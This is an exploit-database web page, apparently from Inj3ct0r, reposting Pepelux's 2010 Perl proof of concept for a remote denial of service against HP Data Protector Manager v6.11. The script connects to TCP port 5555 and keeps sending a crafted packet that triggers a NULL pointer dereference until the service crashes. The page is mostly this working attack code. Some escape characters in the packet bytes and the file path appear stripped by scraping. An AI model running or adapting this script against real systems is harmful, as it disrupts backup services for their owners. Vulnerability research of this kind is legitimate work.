Home / os / win7

[dos / poc] - HP Data Protector Manager v6.11 / NULL Pointer

Posted on 07 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>HP Data Protector Manager v6.11 / NULL Pointer Dereference DoS | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='HP Data Protector Manager v6.11 / NULL Pointer Dereference DoS by Pepelux in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==============================================================
HP Data Protector Manager v6.11 / NULL Pointer Dereference DoS
==============================================================

# Bug: NULL Pointer Dereference Remote Denial of Service Vulnerabilities
#
# Software: http://www.hp.com
# Date: 06/10/2010
# Author: Pepelux - pepelux[AT]enye-sec[DOT]com
# http://www.enye-sec.org - http://www.pepelux.org
#
# Vulnerable file: Program FilesOmniBackinMSVCR71.dll
# Vulnerable function: wtoi
#
# Tested on Windows XP SP2 &amp; Windows XP SP3

#!/usr/bin/perl

# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: NULL Pointer Dereference Remote Denial of Service Vulnerabilities
#
# Software: http://www.hp.com
# Date: 06/10/2010
# Author: Pepelux - pepelux[AT]enye-sec[DOT]com
#                   http://www.enye-sec.org - http://www.pepelux.org
#
# Vulnerable file: Program FilesOmniBackinMSVCR71.dll
# Vulnerable function: wtoi
#
# Tested on Windows XP SP2 &amp; Windows XP SP3

use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
	print &quot;Usage: perl $0 &lt;host&gt; [port]
&quot;;
	print &quot;	default port = 5555

&quot;;
	exit 1;
}

$port = 5555 if ($ARGV[0]);

if ($^O =~ /Win/) {system(&quot;cls&quot;);}else{system(&quot;clear&quot;);}

my $buf = &quot;x00x00x00x41xffxfex32x00x00x00x20x00x41x00x41x00&quot;.
			 &quot;x41x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00&quot;.
			 &quot;x00x00x20x00x41x00x41x00x41x00x41x00x41x00x00x00&quot;.
			 &quot;x20x00x41x00x41x00x41x00x41x00x41x00x41x00x41x00&quot;.
			 &quot;x00x00x20x00x41x00x41x00x41x00xffxffx20x00x31x00&quot;.
			 &quot;x35x00x00x00x00x00&quot;;

print &quot;[+] Connecting to $server:$port ...
&quot;;

my $sock1 = new IO::Socket::INET (PeerAddr =&gt; $server, PeerPort =&gt; $port, Timeout =&gt; &#039;10&#039;, Proto =&gt; &#039;tcp&#039;) or die(&quot;Server $server is not available.
&quot;);

print &quot;[+] Sending malicious packet ...
&quot;;

my $crashed = 0;

while($crashed eq 0) {
	print $sock1 &quot;$buf&quot; or $crashed = 1;
}

print &quot;
[x] Server crashed!
&quot;; 
exit;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-07]</pre></body></html>

 

TOP